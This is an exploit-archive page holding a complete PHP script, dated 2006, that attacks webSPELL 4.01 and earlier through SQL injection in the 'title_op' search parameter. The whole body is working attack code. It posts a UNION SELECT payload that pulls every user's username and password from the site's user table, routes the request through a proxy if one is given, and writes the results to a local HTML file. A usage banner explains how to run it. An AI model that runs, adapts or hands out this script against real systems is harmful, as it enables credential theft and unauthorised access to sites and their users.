[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit
# Published : 2006-02-14
# Author : x128
# Previous Title : MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit
# Next Title : Invision Power Board Army System Mod 2.1 SQL Injection Exploit


<?
error_reporting(E_ERROR);

function xss_init()
{
    if (!extension_loaded('php_curl'))
    {
       if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll'))
       die ("oo error - cannot load curl extension!");
    }
}

function xss_header()
{
    echo "noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooon";
    echo "                                  oo    ooooooo     ooooooon";
    echo "                    oooo   oooo o888  o88     888 o888   888on";
    echo "                      888o888    888        o888   888888888n";
    echo "                      o88888o    888     o888   o 888o   o888n";
    echo "                    o88o   o88o o888o o8888oooo88   88ooo88n";
    echo "oooooooooooooooooooooooooooo webspell 4.01 exploit ooooooooooooooooooooooooooooon";
    echo "oo usage          $ php webspell-401-exploit.php [url] [prefix]n";
    echo "oo proxy support  $ php webspell-401-exploit.php [url] [prefix] [proxy]:[port]n";
    echo "oo example        $ php webspell-401-exploit.php http://localhost webs_n";
    echo "oo open the file webspell_pw.html - there you find the passwords of all usersnn";
}

function xss_bottom()
{
    echo "noo discover : x128 - alexander wilhelm - 13/02/2006n";
    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net";
}

function xss_exploit()
{
    $xss_target = $_SERVER['argv'][1] . "/index.php";
    $xss_http_get = "?site=search&action=search";
    $xss_http_post = "table=news&title1=9a39b0c5e6849658e30d1432a308103d&title_op=UNION SELECT 1, 1, 1, 1, username, `password`, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM ". $_SERVER['argv'][2] ."user/*";

    $xss_connection = curl_init();

    if ($_SERVER['argv'][3])
    {
        curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8);
        curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][3]);
    }

    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);
    curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
    curl_setopt ($xss_connection, CURLOPT_POST, 1);
    curl_setopt ($xss_connection, CURLOPT_POSTFIELDS, $xss_http_post);
    curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');

    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!");

    if ($xss_source) echo "oo dafaced ...n";

    $xss_output = fopen("webspell_pw.html","w");
    fputs($xss_output, $xss_source);
    fclose($xss_output);

    curl_close ($xss_connection); 
}

xss_init();
xss_header();
xss_exploit();
xss_bottom();
?>

# www.Syue.com [2006-02-14]